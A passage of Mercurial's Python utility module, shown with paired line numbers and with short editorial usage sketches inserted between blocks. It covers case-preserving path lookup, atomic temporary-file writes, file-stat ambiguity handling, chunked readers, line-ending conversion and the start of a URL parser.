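# Editorial sketch: callers go through the wrapper instance above and get re2
# when it is importable and the flags are supported, or the stdlib engine
# otherwise, with no change at the call site. Hypothetical helper.
def _demorecompile():
    pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
    return bool(pat.match(b'A' * 40))  # -> True with either engine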
1835 1848 _fspathcache = {}
1836 1849 def fspath(name, root):
1837 1850 '''Get name in the case stored in the filesystem
1838 1851
1839 1852 The name should be relative to root, and be normcase-ed for efficiency.
1840 1853
1841 1854 Note that this function is unnecessary, and should not be
1842 1855 called, for case-sensitive filesystems (simply because it's expensive).
1843 1856
1844 1857 The root should be normcase-ed, too.
1845 1858 '''
1846 1859 def _makefspathcacheentry(dir):
1847 1860 return dict((normcase(n), n) for n in os.listdir(dir))
1848 1861
1849 1862 seps = pycompat.ossep
1850 1863 if pycompat.osaltsep:
1851 1864 seps = seps + pycompat.osaltsep
1852 1865 # Protect backslashes. This gets silly very quickly.
1853 1866 seps = seps.replace('\\', '\\\\')
1854 1867 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1855 1868 dir = os.path.normpath(root)
1856 1869 result = []
1857 1870 for part, sep in pattern.findall(name):
1858 1871 if sep:
1859 1872 result.append(sep)
1860 1873 continue
1861 1874
1862 1875 if dir not in _fspathcache:
1863 1876 _fspathcache[dir] = _makefspathcacheentry(dir)
1864 1877 contents = _fspathcache[dir]
1865 1878
1866 1879 found = contents.get(part)
1867 1880 if not found:
1868 1881 # retry "once per directory" per "dirstate.walk", which
1869 1882 # may take place for each patch of "hg qpush", for example
1870 1883 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1871 1884 found = contents.get(part)
1872 1885
1873 1886 result.append(found or part)
1874 1887 dir = os.path.join(dir, part)
1875 1888
1876 1889 return ''.join(result)
1877 1890
1878 1891 def checknlink(testfile):
1879 1892 '''check whether hardlink count reporting works properly'''
1880 1893
1881 1894 # testfile may be open, so we need a separate file for checking to
1882 1895 # work around issue2543 (or testfile may get lost on Samba shares)
1883 1896 f1, f2, fp = None, None, None
1884 1897 try:
1885 1898 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1886 1899 suffix='1~', dir=os.path.dirname(testfile))
1887 1900 os.close(fd)
1888 1901 f2 = '%s2~' % f1[:-2]
1889 1902
1890 1903 oslink(f1, f2)
1891 1904 # nlinks() may behave differently for files on Windows shares if
1892 1905 # the file is open.
1893 1906 fp = posixfile(f2)
1894 1907 return nlinks(f2) > 1
1895 1908 except OSError:
1896 1909 return False
1897 1910 finally:
1898 1911 if fp is not None:
1899 1912 fp.close()
1900 1913 for f in (f1, f2):
1901 1914 try:
1902 1915 if f is not None:
1903 1916 os.unlink(f)
1904 1917 except OSError:
1905 1918 pass
1906 1919
1907 1920 def endswithsep(path):
1908 1921 '''Check path ends with os.sep or os.altsep.'''
1909 1922 return (path.endswith(pycompat.ossep)
1910 1923 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1911 1924
1912 1925 def splitpath(path):
1913 1926 '''Split path by os.sep.
1914 1927 Note that this function does not use os.altsep because this is
1915 1928 an alternative to a simple "xxx.split(os.sep)".
1916 1929 It is recommended to use os.path.normpath() before using this
1917 1930 function if needed.'''
1918 1931 return path.split(pycompat.ossep)
1919 1932
1920 1933 def mktempcopy(name, emptyok=False, createmode=None):
1921 1934 """Create a temporary file with the same contents from name
1922 1935
1923 1936 The permission bits are copied from the original file.
1924 1937
1925 1938 If the temporary file is going to be truncated immediately, you
1926 1939 can use emptyok=True as an optimization.
1927 1940
1928 1941 Returns the name of the temporary file.
1929 1942 """
1930 1943 d, fn = os.path.split(name)
1931 1944 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1932 1945 os.close(fd)
1933 1946 # Temporary files are created with mode 0600, which is usually not
1934 1947 # what we want. If the original file already exists, just copy
1935 1948 # its mode. Otherwise, manually obey umask.
1936 1949 copymode(name, temp, createmode)
1937 1950 if emptyok:
1938 1951 return temp
1939 1952 try:
1940 1953 try:
1941 1954 ifp = posixfile(name, "rb")
1942 1955 except IOError as inst:
1943 1956 if inst.errno == errno.ENOENT:
1944 1957 return temp
1945 1958 if not getattr(inst, 'filename', None):
1946 1959 inst.filename = name
1947 1960 raise
1948 1961 ofp = posixfile(temp, "wb")
1949 1962 for chunk in filechunkiter(ifp):
1950 1963 ofp.write(chunk)
1951 1964 ifp.close()
1952 1965 ofp.close()
1953 1966 except: # re-raises
1954 1967 try:
1955 1968 os.unlink(temp)
1956 1969 except OSError:
1957 1970 pass
1958 1971 raise
1959 1972 return temp
1960 1973
1961 1974 class filestat(object):
1962 1975 """help to exactly detect change of a file
1963 1976
1964 1977 'stat' attribute is result of 'os.stat()' if specified 'path'
1965 1978 exists. Otherwise, it is None. This can avoid preparative
1966 1979 'exists()' examination on client side of this class.
1967 1980 """
1968 1981 def __init__(self, stat):
1969 1982 self.stat = stat
1970 1983
1971 1984 @classmethod
1972 1985 def frompath(cls, path):
1973 1986 try:
1974 1987 stat = os.stat(path)
1975 1988 except OSError as err:
1976 1989 if err.errno != errno.ENOENT:
1977 1990 raise
1978 1991 stat = None
1979 1992 return cls(stat)
1980 1993
1981 1994 @classmethod
1982 1995 def fromfp(cls, fp):
1983 1996 stat = os.fstat(fp.fileno())
1984 1997 return cls(stat)
1985 1998
1986 1999 __hash__ = object.__hash__
1987 2000
1988 2001 def __eq__(self, old):
1989 2002 try:
1990 2003 # if ambiguity between stat of new and old file is
1991 2004 # avoided, comparison of size, ctime and mtime is enough
1992 2005 # to exactly detect change of a file regardless of platform
1993 2006 return (self.stat.st_size == old.stat.st_size and
1994 2007 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1995 2008 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1996 2009 except AttributeError:
1997 2010 pass
1998 2011 try:
1999 2012 return self.stat is None and old.stat is None
2000 2013 except AttributeError:
2001 2014 return False
2002 2015
2003 2016 def isambig(self, old):
2004 2017 """Examine whether new (= self) stat is ambiguous against old one
2005 2018
2006 2019 "S[N]" below means stat of a file at N-th change:
2007 2020
2008 2021 - S[n-1].ctime < S[n].ctime: can detect change of a file
2009 2022 - S[n-1].ctime == S[n].ctime
2010 2023 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2011 2024 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2012 2025 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2013 2026 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2014 2027
2015 2028 Case (*2) above means that a file was changed twice or more at
2016 2029 same time in sec (= S[n-1].ctime), and comparison of timestamp
2017 2030 is ambiguous.
2018 2031
2019 2032 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2020 2033 timestamp is ambiguous".
2021 2034
2022 2035 But advancing mtime only in case (*2) doesn't work as
2023 2036 expected, because naturally advanced S[n].mtime in case (*1)
2024 2037 might be equal to manually advanced S[n-1 or earlier].mtime.
2025 2038
2026 2039 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2027 2040 treated as ambiguous regardless of mtime, to avoid overlooking
2028 2041 changes masked by collisions between such mtimes.
2029 2042
2030 2043 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2031 2044 S[n].mtime", even if size of a file isn't changed.
2032 2045 """
2033 2046 try:
2034 2047 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2035 2048 except AttributeError:
2036 2049 return False
2037 2050
2038 2051 def avoidambig(self, path, old):
2039 2052 """Change file stat of specified path to avoid ambiguity
2040 2053
2041 2054 'old' should be previous filestat of 'path'.
2042 2055
2043 2056 This skips avoiding ambiguity, if a process doesn't have
2044 2057 appropriate privileges for 'path'. This returns False in this
2045 2058 case.
2046 2059
2047 2060 Otherwise, this returns True, as "ambiguity is avoided".
2048 2061 """
2049 2062 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2050 2063 try:
2051 2064 os.utime(path, (advanced, advanced))
2052 2065 except OSError as inst:
2053 2066 if inst.errno == errno.EPERM:
2054 2067 # utime() on the file created by another user causes EPERM,
2055 2068 # if a process doesn't have appropriate privileges
2056 2069 return False
2057 2070 raise
2058 2071 return True
2059 2072
2060 2073 def __ne__(self, other):
2061 2074 return not self == other
2062 2075
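# Editorial sketch: the expected pattern for filestat is to snapshot before a
# rewrite, snapshot after, and nudge the mtime when the pair is ambiguous.
# The helper is hypothetical; writefile() is defined later in this module.
def _demoavoidambig(path):
    old = filestat.frompath(path)
    writefile(path, b'new content')
    new = filestat.frompath(path)
    if new.isambig(old):
        new.avoidambig(path, old)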
2063 2076 class atomictempfile(object):
2064 2077 '''writable file object that atomically updates a file
2065 2078
2066 2079 All writes will go to a temporary copy of the original file. Call
2067 2080 close() when you are done writing, and atomictempfile will rename
2068 2081 the temporary copy to the original name, making the changes
2069 2082 visible. If the object is destroyed without being closed, all your
2070 2083 writes are discarded.
2071 2084
2072 2085 checkambig argument of constructor is used with filestat, and is
2073 2086 useful only if target file is guarded by any lock (e.g. repo.lock
2074 2087 or repo.wlock).
2075 2088 '''
2076 2089 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2077 2090 self.__name = name # permanent name
2078 2091 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2079 2092 createmode=createmode)
2080 2093 self._fp = posixfile(self._tempname, mode)
2081 2094 self._checkambig = checkambig
2082 2095
2083 2096 # delegated methods
2084 2097 self.read = self._fp.read
2085 2098 self.write = self._fp.write
2086 2099 self.seek = self._fp.seek
2087 2100 self.tell = self._fp.tell
2088 2101 self.fileno = self._fp.fileno
2089 2102
2090 2103 def close(self):
2091 2104 if not self._fp.closed:
2092 2105 self._fp.close()
2093 2106 filename = localpath(self.__name)
2094 2107 oldstat = self._checkambig and filestat.frompath(filename)
2095 2108 if oldstat and oldstat.stat:
2096 2109 rename(self._tempname, filename)
2097 2110 newstat = filestat.frompath(filename)
2098 2111 if newstat.isambig(oldstat):
2099 2112 # stat of changed file is ambiguous to original one
2100 2113 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2101 2114 os.utime(filename, (advanced, advanced))
2102 2115 else:
2103 2116 rename(self._tempname, filename)
2104 2117
2105 2118 def discard(self):
2106 2119 if not self._fp.closed:
2107 2120 try:
2108 2121 os.unlink(self._tempname)
2109 2122 except OSError:
2110 2123 pass
2111 2124 self._fp.close()
2112 2125
2113 2126 def __del__(self):
2114 2127 if safehasattr(self, '_fp'): # constructor actually did something
2115 2128 self.discard()
2116 2129
2117 2130 def __enter__(self):
2118 2131 return self
2119 2132
2120 2133 def __exit__(self, exctype, excvalue, traceback):
2121 2134 if exctype is not None:
2122 2135 self.discard()
2123 2136 else:
2124 2137 self.close()
2125 2138
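# Editorial sketch: used as a context manager, atomictempfile publishes the
# complete new contents on a clean exit and discards everything if the block
# raises. Hypothetical helper.
def _demoatomicwrite(path, data):
    with atomictempfile(path, 'wb') as fp:
        fp.write(data)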
2126 2139 def unlinkpath(f, ignoremissing=False, rmdir=True):
2127 2140 """unlink and remove the directory if it is empty"""
2128 2141 if ignoremissing:
2129 2142 tryunlink(f)
2130 2143 else:
2131 2144 unlink(f)
2132 2145 if rmdir:
2133 2146 # try removing directories that might now be empty
2134 2147 try:
2135 2148 removedirs(os.path.dirname(f))
2136 2149 except OSError:
2137 2150 pass
2138 2151
2139 2152 def tryunlink(f):
2140 2153 """Attempt to remove a file, ignoring ENOENT errors."""
2141 2154 try:
2142 2155 unlink(f)
2143 2156 except OSError as e:
2144 2157 if e.errno != errno.ENOENT:
2145 2158 raise
2146 2159
2147 2160 def makedirs(name, mode=None, notindexed=False):
2148 2161 """recursive directory creation with parent mode inheritance
2149 2162
2150 2163 Newly created directories are marked as "not to be indexed by
2151 2164 the content indexing service", if ``notindexed`` is specified
2152 2165 for "write" mode access.
2153 2166 """
2154 2167 try:
2155 2168 makedir(name, notindexed)
2156 2169 except OSError as err:
2157 2170 if err.errno == errno.EEXIST:
2158 2171 return
2159 2172 if err.errno != errno.ENOENT or not name:
2160 2173 raise
2161 2174 parent = os.path.dirname(os.path.abspath(name))
2162 2175 if parent == name:
2163 2176 raise
2164 2177 makedirs(parent, mode, notindexed)
2165 2178 try:
2166 2179 makedir(name, notindexed)
2167 2180 except OSError as err:
2168 2181 # Catch EEXIST to handle races
2169 2182 if err.errno == errno.EEXIST:
2170 2183 return
2171 2184 raise
2172 2185 if mode is not None:
2173 2186 os.chmod(name, mode)
2174 2187
2175 2188 def readfile(path):
2176 2189 with open(path, 'rb') as fp:
2177 2190 return fp.read()
2178 2191
2179 2192 def writefile(path, text):
2180 2193 with open(path, 'wb') as fp:
2181 2194 fp.write(text)
2182 2195
2183 2196 def appendfile(path, text):
2184 2197 with open(path, 'ab') as fp:
2185 2198 fp.write(text)
2186 2199
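# Editorial sketch: the three one-shot helpers above cover the common
# write/append/read cycle without explicit file objects. Hypothetical helper.
def _demofilehelpers(path):
    writefile(path, b'one\n')
    appendfile(path, b'two\n')
    return readfile(path)  # -> b'one\ntwo\n'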
2187 2200 class chunkbuffer(object):
2188 2201 """Allow arbitrary sized chunks of data to be efficiently read from an
2189 2202 iterator over chunks of arbitrary size."""
2190 2203
2191 2204 def __init__(self, in_iter):
2192 2205 """in_iter is the iterator that's iterating over the input chunks."""
2193 2206 def splitbig(chunks):
2194 2207 for chunk in chunks:
2195 2208 if len(chunk) > 2**20:
2196 2209 pos = 0
2197 2210 while pos < len(chunk):
2198 2211 end = pos + 2 ** 18
2199 2212 yield chunk[pos:end]
2200 2213 pos = end
2201 2214 else:
2202 2215 yield chunk
2203 2216 self.iter = splitbig(in_iter)
2204 2217 self._queue = collections.deque()
2205 2218 self._chunkoffset = 0
2206 2219
2207 2220 def read(self, l=None):
2208 2221 """Read L bytes of data from the iterator of chunks of data.
2209 2222 Returns less than L bytes if the iterator runs dry.
2210 2223
2211 2224 If the size parameter is omitted, read everything."""
2212 2225 if l is None:
2213 2226 return ''.join(self.iter)
2214 2227
2215 2228 left = l
2216 2229 buf = []
2217 2230 queue = self._queue
2218 2231 while left > 0:
2219 2232 # refill the queue
2220 2233 if not queue:
2221 2234 target = 2**18
2222 2235 for chunk in self.iter:
2223 2236 queue.append(chunk)
2224 2237 target -= len(chunk)
2225 2238 if target <= 0:
2226 2239 break
2227 2240 if not queue:
2228 2241 break
2229 2242
2230 2243 # The easy way to do this would be to queue.popleft(), modify the
2231 2244 # chunk (if necessary), then queue.appendleft(). However, for cases
2232 2245 # where we read partial chunk content, this incurs 2 dequeue
2233 2246 # mutations and creates a new str for the remaining chunk in the
2234 2247 # queue. Our code below avoids this overhead.
2235 2248
2236 2249 chunk = queue[0]
2237 2250 chunkl = len(chunk)
2238 2251 offset = self._chunkoffset
2239 2252
2240 2253 # Use full chunk.
2241 2254 if offset == 0 and left >= chunkl:
2242 2255 left -= chunkl
2243 2256 queue.popleft()
2244 2257 buf.append(chunk)
2245 2258 # self._chunkoffset remains at 0.
2246 2259 continue
2247 2260
2248 2261 chunkremaining = chunkl - offset
2249 2262
2250 2263 # Use all of unconsumed part of chunk.
2251 2264 if left >= chunkremaining:
2252 2265 left -= chunkremaining
2253 2266 queue.popleft()
2254 2267 # The offset == 0 case is handled by the block above, so this won't
2255 2268 # merely copy via ``chunk[0:]``.
2256 2269 buf.append(chunk[offset:])
2257 2270 self._chunkoffset = 0
2258 2271
2259 2272 # Partial chunk needed.
2260 2273 else:
2261 2274 buf.append(chunk[offset:offset + left])
2262 2275 self._chunkoffset += left
2263 2276 left -= chunkremaining
2264 2277
2265 2278 return ''.join(buf)
2266 2279
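# Editorial sketch: chunkbuffer turns ragged input chunks into exact-size
# reads; sized read() calls are the intended usage. Hypothetical helper.
def _demochunkbuffer():
    buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
    return buf.read(4), buf.read(4)  # -> (b'abcd', b'efgh')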
2267 2280 def filechunkiter(f, size=131072, limit=None):
2268 2281 """Create a generator that produces the data in the file size
2269 2282 (default 131072) bytes at a time, up to optional limit (default is
2270 2283 to read all data). Chunks may be less than size bytes if the
2271 2284 chunk is the last chunk in the file, or the file is a socket or
2272 2285 some other type of file that sometimes reads less data than is
2273 2286 requested."""
2274 2287 assert size >= 0
2275 2288 assert limit is None or limit >= 0
2276 2289 while True:
2277 2290 if limit is None:
2278 2291 nbytes = size
2279 2292 else:
2280 2293 nbytes = min(limit, size)
2281 2294 s = nbytes and f.read(nbytes)
2282 2295 if not s:
2283 2296 break
2284 2297 if limit:
2285 2298 limit -= len(s)
2286 2299 yield s
2287 2300
2288 2301 class cappedreader(object):
2289 2302 """A file object proxy that allows reading up to N bytes.
2290 2303
2291 2304 Given a source file object, instances of this type allow reading up to
2292 2305 N bytes from that source file object. Attempts to read past the allowed
2293 2306 limit are treated as EOF.
2294 2307
2295 2308 It is assumed that I/O is not performed on the original file object
2296 2309 in addition to I/O that is performed by this instance. If there is,
2297 2310 state tracking will get out of sync and unexpected results will ensue.
2298 2311 """
2299 2312 def __init__(self, fh, limit):
2300 2313 """Allow reading up to <limit> bytes from <fh>."""
2301 2314 self._fh = fh
2302 2315 self._left = limit
2303 2316
2304 2317 def read(self, n=-1):
2305 2318 if not self._left:
2306 2319 return b''
2307 2320
2308 2321 if n < 0:
2309 2322 n = self._left
2310 2323
2311 2324 data = self._fh.read(min(n, self._left))
2312 2325 self._left -= len(data)
2313 2326 assert self._left >= 0
2314 2327
2315 2328 return data
2316 2329
2317 2330 def readinto(self, b):
2318 2331 res = self.read(len(b))
2319 2332 if res is None:
2320 2333 return None
2321 2334
2322 2335 b[0:len(res)] = res
2323 2336 return len(res)
2324 2337
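# Editorial sketch: cappedreader makes the first N bytes of a stream look like
# the whole stream; bytesio is the alias imported at the top of this module.
# Hypothetical helper.
def _democappedreader():
    fh = bytesio(b'0123456789')
    return cappedreader(fh, 4).read()  # -> b'0123'; further reads give b''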
2325 2338 def unitcountfn(*unittable):
2326 2339 '''return a function that renders a readable count of some quantity'''
2327 2340
2328 2341 def go(count):
2329 2342 for multiplier, divisor, format in unittable:
2330 2343 if abs(count) >= divisor * multiplier:
2331 2344 return format % (count / float(divisor))
2332 2345 return unittable[-1][2] % count
2333 2346
2334 2347 return go
2335 2348
2336 2349 def processlinerange(fromline, toline):
2337 2350 """Check that linerange <fromline>:<toline> makes sense and return a
2338 2351 0-based range.
2339 2352
2340 2353 >>> processlinerange(10, 20)
2341 2354 (9, 20)
2342 2355 >>> processlinerange(2, 1)
2343 2356 Traceback (most recent call last):
2344 2357 ...
2345 2358 ParseError: line range must be positive
2346 2359 >>> processlinerange(0, 5)
2347 2360 Traceback (most recent call last):
2348 2361 ...
2349 2362 ParseError: fromline must be strictly positive
2350 2363 """
2351 2364 if toline - fromline < 0:
2352 2365 raise error.ParseError(_("line range must be positive"))
2353 2366 if fromline < 1:
2354 2367 raise error.ParseError(_("fromline must be strictly positive"))
2355 2368 return fromline - 1, toline
2356 2369
2357 2370 bytecount = unitcountfn(
2358 2371 (100, 1 << 30, _('%.0f GB')),
2359 2372 (10, 1 << 30, _('%.1f GB')),
2360 2373 (1, 1 << 30, _('%.2f GB')),
2361 2374 (100, 1 << 20, _('%.0f MB')),
2362 2375 (10, 1 << 20, _('%.1f MB')),
2363 2376 (1, 1 << 20, _('%.2f MB')),
2364 2377 (100, 1 << 10, _('%.0f KB')),
2365 2378 (10, 1 << 10, _('%.1f KB')),
2366 2379 (1, 1 << 10, _('%.2f KB')),
2367 2380 (1, 1, _('%.0f bytes')),
2368 2381 )
2369 2382
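# Editorial sketch: the generated function scans the table top-down and
# renders with the first precision whose threshold the value meets.
# Hypothetical helper.
def _demobytecount():
    return bytecount(1 << 20), bytecount(500)  # -> ('1.00 MB', '500 bytes')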
2370 2383 class transformingwriter(object):
2371 2384 """Writable file wrapper to transform data by function"""
2372 2385
2373 2386 def __init__(self, fp, encode):
2374 2387 self._fp = fp
2375 2388 self._encode = encode
2376 2389
2377 2390 def close(self):
2378 2391 self._fp.close()
2379 2392
2380 2393 def flush(self):
2381 2394 self._fp.flush()
2382 2395
2383 2396 def write(self, data):
2384 2397 return self._fp.write(self._encode(data))
2385 2398
2386 2399 # Matches a single EOL which can either be a CRLF where repeated CR
2387 2400 # are removed or a LF. We do not care about old Macintosh files, so a
2388 2401 # stray CR is an error.
2389 2402 _eolre = remod.compile(br'\r*\n')
2390 2403
2391 2404 def tolf(s):
2392 2405 return _eolre.sub('\n', s)
2393 2406
2394 2407 def tocrlf(s):
2395 2408 return _eolre.sub('\r\n', s)
2396 2409
2397 2410 def _crlfwriter(fp):
2398 2411 return transformingwriter(fp, tocrlf)
2399 2412
2400 2413 if pycompat.oslinesep == '\r\n':
2401 2414 tonativeeol = tocrlf
2402 2415 fromnativeeol = tolf
2403 2416 nativeeolwriter = _crlfwriter
2404 2417 else:
2405 2418 tonativeeol = pycompat.identity
2406 2419 fromnativeeol = pycompat.identity
2407 2420 nativeeolwriter = pycompat.identity
2408 2421
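# Editorial sketch: normalizing to LF first and then converting makes the
# result deterministic on every platform; on Windows this yields CRLF,
# elsewhere the data is returned unchanged. Hypothetical helper.
def _demonativeeol(data):
    return tonativeeol(tolf(data))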
2409 2422 if (pyplatform.python_implementation() == 'CPython' and
2410 2423 sys.version_info < (3, 0)):
2411 2424 # There is an issue in CPython that some IO methods do not handle EINTR
2412 2425 # correctly. The following table shows what CPython version (and functions)
2413 2426 # are affected (buggy: has the EINTR bug, okay: otherwise):
2414 2427 #
2415 2428 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2416 2429 # --------------------------------------------------
2417 2430 # fp.__iter__ | buggy | buggy | okay
2418 2431 # fp.read* | buggy | okay [1] | okay
2419 2432 #
2420 2433 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2421 2434 #
2422 2435 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2423 2436 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2424 2437 #
2425 2438 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2426 2439 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2427 2440 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2428 2441 # fp.__iter__ but not other fp.read* methods.
2429 2442 #
2430 2443 # On modern systems like Linux, the "read" syscall cannot be interrupted
2431 2444 # when reading "fast" files like on-disk files. So the EINTR issue only
2432 2445 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2433 2446 # files approximately as "fast" files and use the fast (unsafe) code path,
2434 2447 # to minimize the performance impact.
2435 2448 if sys.version_info >= (2, 7, 4):
2436 2449 # fp.readline deals with EINTR correctly, use it as a workaround.
2437 2450 def _safeiterfile(fp):
2438 2451 return iter(fp.readline, '')
2439 2452 else:
2440 2453 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2441 2454 # note: this may block longer than necessary because of bufsize.
2442 2455 def _safeiterfile(fp, bufsize=4096):
2443 2456 fd = fp.fileno()
2444 2457 line = ''
2445 2458 while True:
2446 2459 try:
2447 2460 buf = os.read(fd, bufsize)
2448 2461 except OSError as ex:
2449 2462 # os.read only raises EINTR before any data is read
2450 2463 if ex.errno == errno.EINTR:
2451 2464 continue
2452 2465 else:
2453 2466 raise
2454 2467 line += buf
2455 2468 if '\n' in buf:
2456 2469 splitted = line.splitlines(True)
2457 2470 line = ''
2458 2471 for l in splitted:
2459 2472 if l[-1] == '\n':
2460 2473 yield l
2461 2474 else:
2462 2475 line = l
2463 2476 if not buf:
2464 2477 break
2465 2478 if line:
2466 2479 yield line
2467 2480
2468 2481 def iterfile(fp):
2469 2482 fastpath = True
2470 2483 if type(fp) is file:
2471 2484 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2472 2485 if fastpath:
2473 2486 return fp
2474 2487 else:
2475 2488 return _safeiterfile(fp)
2476 2489 else:
2477 2490 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2478 2491 def iterfile(fp):
2479 2492 return fp
2480 2493
2481 2494 def iterlines(iterator):
2482 2495 for chunk in iterator:
2483 2496 for line in chunk.splitlines():
2484 2497 yield line
2485 2498
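# Editorial sketch: iterlines() splits each chunk independently, so it is
# meant for producers whose chunk boundaries fall on line boundaries.
# Hypothetical helper.
def _demoiterlines():
    return list(iterlines([b'a\nb\n', b'c\n']))  # -> [b'a', b'b', b'c']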
2486 2499 def expandpath(path):
2487 2500 return os.path.expanduser(os.path.expandvars(path))
2488 2501
2489 2502 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2490 2503 """Return the result of interpolating items in the mapping into string s.
2491 2504
2492 2505 prefix is a single character string, or a two character string with
2493 2506 a backslash as the first character if the prefix needs to be escaped in
2494 2507 a regular expression.
2495 2508
2496 2509 fn is an optional function that will be applied to the replacement text
2497 2510 just before replacement.
2498 2511
2499 2512 escape_prefix is an optional flag that allows using doubled prefix for
2500 2513 its escaping.
2501 2514 """
2502 2515 fn = fn or (lambda s: s)
2503 2516 patterns = '|'.join(mapping.keys())
2504 2517 if escape_prefix:
2505 2518 patterns += '|' + prefix
2506 2519 if len(prefix) > 1:
2507 2520 prefix_char = prefix[1:]
2508 2521 else:
2509 2522 prefix_char = prefix
2510 2523 mapping[prefix_char] = prefix_char
2511 2524 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2512 2525 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2513 2526
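# Editorial sketch: a single-character prefix plus a mapping is enough for
# simple template expansion. Hypothetical helper.
def _demointerpolate():
    # -> b'hello alice'
    return interpolate(b'%', {b'user': b'alice'}, b'hello %user')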
2514 2527 def getport(port):
2515 2528 """Return the port for a given network service.
2516 2529
2517 2530 If port is an integer, it's returned as is. If it's a string, it's
2518 2531 looked up using socket.getservbyname(). If there's no matching
2519 2532 service, error.Abort is raised.
2520 2533 """
2521 2534 try:
2522 2535 return int(port)
2523 2536 except ValueError:
2524 2537 pass
2525 2538
2526 2539 try:
2527 2540 return socket.getservbyname(pycompat.sysstr(port))
2528 2541 except socket.error:
2529 2542 raise error.Abort(_("no port number associated with service '%s'")
2530 2543 % port)
2531 2544
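# Editorial sketch: integers (and numeric strings) pass through unchanged,
# while anything else goes to socket.getservbyname() and aborts when the
# service is unknown. Hypothetical helper.
def _demogetport():
    return getport(8080)  # -> 8080; getport(b'https') would resolve to 443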
2532 2545 class url(object):
2533 2546 r"""Reliable URL parser.
2534 2547
2535 2548 This parses URLs and provides attributes for the following
2536 2549 components:
2537 2550
2538 2551 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2539 2552
2540 2553 Missing components are set to None. The only exception is
2541 2554 fragment, which is set to '' if present but empty.
2542 2555
2543 2556 If parsefragment is False, fragment is included in query. If
2544 2557 parsequery is False, query is included in path. If both are
2545 2558 False, both fragment and query are included in path.
2546 2559
2547 2560 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2548 2561
2549 2562 Note that for backward compatibility reasons, bundle URLs do not
2550 2563 take host names. That means 'bundle://../' has a path of '../'.
2551 2564
2552 2565 Examples:
2553 2566
2554 2567 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2555 2568 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2556 2569 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2557 2570 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2558 2571 >>> url(b'file:///home/joe/repo')
2559 2572 <url scheme: 'file', path: '/home/joe/repo'>
2560 2573 >>> url(b'file:///c:/temp/foo/')
2561 2574 <url scheme: 'file', path: 'c:/temp/foo/'>
2562 2575 >>> url(b'bundle:foo')
2563 2576 <url scheme: 'bundle', path: 'foo'>
2564 2577 >>> url(b'bundle://../foo')
2565 2578 <url scheme: 'bundle', path: '../foo'>
2566 2579 >>> url(br'c:\foo\bar')
2567 2580 <url path: 'c:\\foo\\bar'>
2568 2581 >>> url(br'\\blah\blah\blah')
2569 2582 <url path: '\\\\blah\\blah\\blah'>
2570 2583 >>> url(br'\\blah\blah\blah#baz')
2571 2584 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2572 2585 >>> url(br'file:///C:\users\me')
2573 2586 <url scheme: 'file', path: 'C:\\users\\me'>
2574 2587
2575 2588 Authentication credentials:
2576 2589
2577 2590 >>> url(b'ssh://joe:xyz@x/repo')
2578 2591 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2579 2592 >>> url(b'ssh://joe@x/repo')
2580 2593 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2581 2594
2582 2595 Query strings and fragments:
2583 2596
2584 2597 >>> url(b'http://host/a?b#c')
2585 2598 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2586 2599 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2587 2600 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2588 2601
2589 2602 Empty path:
2590 2603
2591 2604 >>> url(b'')
2592 2605 <url path: ''>
2593 2606 >>> url(b'#a')
2594 2607 <url path: '', fragment: 'a'>
2595 2608 >>> url(b'http://host/')
2596 2609 <url scheme: 'http', host: 'host', path: ''>
2597 2610 >>> url(b'http://host/#a')
2598 2611 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2599 2612
2600 2613 Only scheme:
2601 2614
2602 2615 >>> url(b'http:')
2603 2616 <url scheme: 'http'>
2604 2617 """
2605 2618
2606 2619 _safechars = "!~*'()+"
2607 2620 _safepchars = "/!~*'()+:\\"
2608 2621 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2609 2622
